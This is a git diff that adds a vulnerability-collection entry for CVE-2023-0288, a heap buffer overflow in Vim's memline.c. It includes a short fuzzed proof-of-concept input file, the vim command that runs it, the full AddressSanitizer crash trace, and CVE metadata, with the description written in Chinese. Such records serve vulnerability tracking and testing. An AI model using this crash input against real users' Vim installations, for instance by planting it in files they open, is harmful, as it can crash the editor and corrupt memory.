diff --git a/cve/vim/2023/CVE-2023-0288/poc_hbo02_s.dat b/cve/vim/2023/CVE-2023-0288/poc_hbo02_s.dat
new file mode 100644
index 0000000000000000000000000000000000000000..78779922fb8c5171d14e2c2ba2b09735ffd52379
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-0288/poc_hbo02_s.dat
@@ -0,0 +1 @@
+sil0norm8RV{zf8=Lu
\ No newline at end of file
diff --git a/cve/vim/2023/CVE-2023-0288/readme.md b/cve/vim/2023/CVE-2023-0288/readme.md
new file mode 100644
index 0000000000000000000000000000000000000000..5ad3db9d77d49e6873c94394a59e830af7ef112c
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-0288/readme.md
@@ -0,0 +1,101 @@
+#### 描述
+
+memline.c:2951处函数ml_append_int中基于堆的缓冲区溢出
+
+#### 影响版本
+
+```
+git log
+commit 043d7b2c84cda275354aa023b5769660ea70a168 (HEAD -> master, tag: v9.0.1182, origin/master, origin/HEAD)
+```
+
+#### Proof of Concept
+
+```
+./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_hbo02_s.dat -c :qa!
+=================================================================
+==11458==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000009d00 at pc 0x00000049950f bp 0x7ffcbaff3ef0 sp 0x7ffcbaff36b8
+READ of size 2147479553 at 0x621000009d00 thread T0
+    #0 0x49950e in __asan_memmove (/home/fuzz/vim/src/vim+0x49950e)
+    #1 0xabc5d7 in ml_append_int /home/fuzz/vim/src/memline.c:2951:6
+    #2 0xa9b51f in ml_flush_line /home/fuzz/vim/src/memline.c:4109:9
+    #3 0xab24bc in ml_append_flush /home/fuzz/vim/src/memline.c:3370:2
+    #4 0xab2342 in ml_append_flags /home/fuzz/vim/src/memline.c:3415:12
+    #5 0x117b44a in u_undoredo /home/fuzz/vim/src/undo.c:2821:7
+    #6 0x117535b in u_doit /home/fuzz/vim/src/undo.c:2273:6
+    #7 0x1174c1a in u_undo /home/fuzz/vim/src/undo.c:2214:5
+    #8 0xbaad92 in nv_kundo /home/fuzz/vim/src/normal.c:4737:2
+    #9 0xba3d19 in nv_undo /home/fuzz/vim/src/normal.c:4719:2
+    #10 0xb6448b in normal_cmd /home/fuzz/vim/src/normal.c:939:5
+    #11 0x83ea0e in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887:6
+    #12 0x83e238 in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850:5
+    #13 0x83dde9 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768:6
+    #14 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2
+    #15 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17
+    #16 0xea1d75 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1672:5
+    #17 0xe9e7d6 in do_source /home/fuzz/vim/src/scriptfile.c:1818:12
+    #18 0xe9e10c in cmd_source /home/fuzz/vim/src/scriptfile.c:1163:14
+    #19 0xe9d7ee in ex_source /home/fuzz/vim/src/scriptfile.c:1189:2
+    #20 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2
+    #21 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17
+    #22 0x7f7831 in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587:12
+    #23 0x14c4e12 in exe_commands /home/fuzz/vim/src/main.c:3146:2
+    #24 0x14c0fae in vim_main2 /home/fuzz/vim/src/main.c:782:2
+    #25 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12
+    #26 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
+    #27 0x41eaad in _start (/home/fuzz/vim/src/vim+0x41eaad)
+
+0x621000009d00 is located 0 bytes to the right of 4096-byte region [0x621000008d00,0x621000009d00)
+allocated by thread T0 here:
+    #0 0x499d0d in malloc (/home/fuzz/vim/src/vim+0x499d0d)
+    #1 0x4cb3ea in lalloc /home/fuzz/vim/src/alloc.c:246:11
+    #2 0x4cb2ca in alloc /home/fuzz/vim/src/alloc.c:151:12
+    #3 0x14ce9f5 in mf_alloc_bhdr /home/fuzz/vim/src/memfile.c:884:21
+    #4 0x14cd807 in mf_new /home/fuzz/vim/src/memfile.c:375:26
+    #5 0xa98308 in ml_new_data /home/fuzz/vim/src/memline.c:4138:15
+    #6 0xa96ca7 in ml_open /home/fuzz/vim/src/memline.c:391:15
+    #7 0x503cd6 in open_buffer /home/fuzz/vim/src/buffer.c:192:9
+    #8 0x14c265c in create_windows /home/fuzz/vim/src/main.c:2915:9
+    #9 0x14c092d in vim_main2 /home/fuzz/vim/src/main.c:713:5
+    #10 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12
+    #11 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/fuzz/vim/src/vim+0x49950e) in __asan_memmove
+Shadow bytes around the buggy address:
+  0x0c427fff9350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fff9360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fff9370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fff9380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fff9390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c427fff93a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fff93c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fff93e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fff93f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+  Shadow gap:              cc
+==11458==ABORTING
+```
+
+#### 影响
+
+这个漏洞能够使软件崩溃，修改内存，并可能造成远程执行。
\ No newline at end of file
diff --git a/cve/vim/2023/yaml/CVE-2023-0288.yaml b/cve/vim/2023/yaml/CVE-2023-0288.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..08329eac674febe2b7f5d153997bcd4193b0467b
--- /dev/null
+++ b/cve/vim/2023/yaml/CVE-2023-0288.yaml
@@ -0,0 +1,19 @@
+id: CVE-2023-0288
+source: https://huntr.dev/bounties/550a0852-9be0-4abe-906c-f803b34e41d3/
+info:
+  name: Vim是一款基于UNIX平台的编辑器。
+  severity: high
+  description: |
+    GitHub存储库vim/vim在9.0.1182版本存在堆buffer溢出漏洞。
+  scope-of-influence:
+    vim < 9.0.1182
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-0288
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2023-0288
+    cwe-id: CWE-122
+    cnvd-id: None
+    kve-id: None
+  tags: cve2023, 堆buffer溢出漏洞
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index e5495c407d72ddeb60d03a6c02759cc4d7de57ca..53dee26795c5376288eb3a282d8525f9eedd8a7e 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -107,6 +107,7 @@ cve:
     - CVE-2023-0049
     - CVE-2023-0051
     - CVE-2023-0054
+    - CVE-2023-0288
     - CVE-2023-0512
     - CVE-2023-1127
   openssl: